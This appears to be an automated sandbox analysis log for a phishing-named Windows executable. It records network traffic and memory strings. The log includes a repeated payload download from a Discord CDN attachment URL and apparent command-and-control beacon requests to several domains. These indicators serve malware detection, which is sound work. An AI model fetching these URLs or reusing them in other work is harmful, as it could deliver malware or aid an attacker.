          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.navairahotels.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=br5CaOBNbOyEtSl01w1InJFcLjJpKSipTIGKYv8LLz1h7U2pe/W5LRlDNuBFVm8Z7kz1&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.aireapartmentsmsp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=QkSDkAQwJsfinh3WrOYNwuLRn/wZcwP5ROix40ZEWiTyy9DSEEEXqyK/VjgFco5oKzQL&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.feasible-weld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.athletes4africa.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=HsquawsfcsgqJ94EtmUD1wYxaBGU5jkWnmyWAJcE1YBxo/BZ5yoFsc9Zh9ltV0MQdvJb&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.sturgisbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49752 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49755 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49811 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49820 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 07 Feb 2022 11:06:19 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 07 Feb 2022 11:06:24 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Feb 2022 11:06:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uyjVU1%2BcFL2homc3PICWErLCPXHFjfoTq90GJAcTrSZAhuq8%2FCsxTpwlaV4mYIuHLTJI6nyWsHbsw6VghhsXnf9dJw%2BnoiC5rk%2FzK3NtcCQ7FXFs%2Bl9fSGqh%2B5s9mw6XM%2F9GzQLVInA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6d9c26312e65699b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 07 Feb 2022 11:02:48 GMTContent-Type: text/htmlContent-Length: 875Connection: closeETag: "5d07e7ed-36b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6f 6e 20 68 6f 6c 64 20 70 65 6e 64 69 6e 67 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 52 65 67 69 73 74 72 61 6e 74 20 61 73 20 70 65 72 20 74 68 65 20 49 43 41 4e 4e 20 72 75 6c 65 73 20 6f 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4d 6f 72 65 20 64 65 74 61 69 6c 73 20 6f 66 20 74 68 65 73 65 20 72 75 6c 65 73 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 61 74 3a 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 61 3e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 70 72 6f 76 69 64 65 72 20 61 6e 64 20 72 65 71 75 65 73 74 20 72 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 72 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 65 6d 61 69 6c 65 64 20 74 6f 20 79 6f 75 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 79 6f 75 72 20 6f 72 64 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 07 Feb 2022 11:06:40 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.358915136.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000003.501286786.000000000C0AE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000003.505943023.000000000C51E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adb
          Source: java.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
          Source: java.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: java.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359212510.0000000002374000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000002.423805671.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.306783409.000000000B74B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307183444.000000000B733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359046322.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305279851.000000000B75C000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305585833.000000000B75F000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305402723.000000000B740000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305495592.000000000B75E000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305344754.000000000B75D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305585833.000000000B75F000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305495592.000000000B75E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cns
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn3
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307183444.000000000B733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnh
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359212510.0000000002374000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000002.423805671.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
          Source: java.exe, java.exe, 0000001F.00000002.572340022.0000000000D12000.00000002.00000001.01000000.00000007.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/939413016561205300/939787018140012564/RDi
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.navairahotels.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
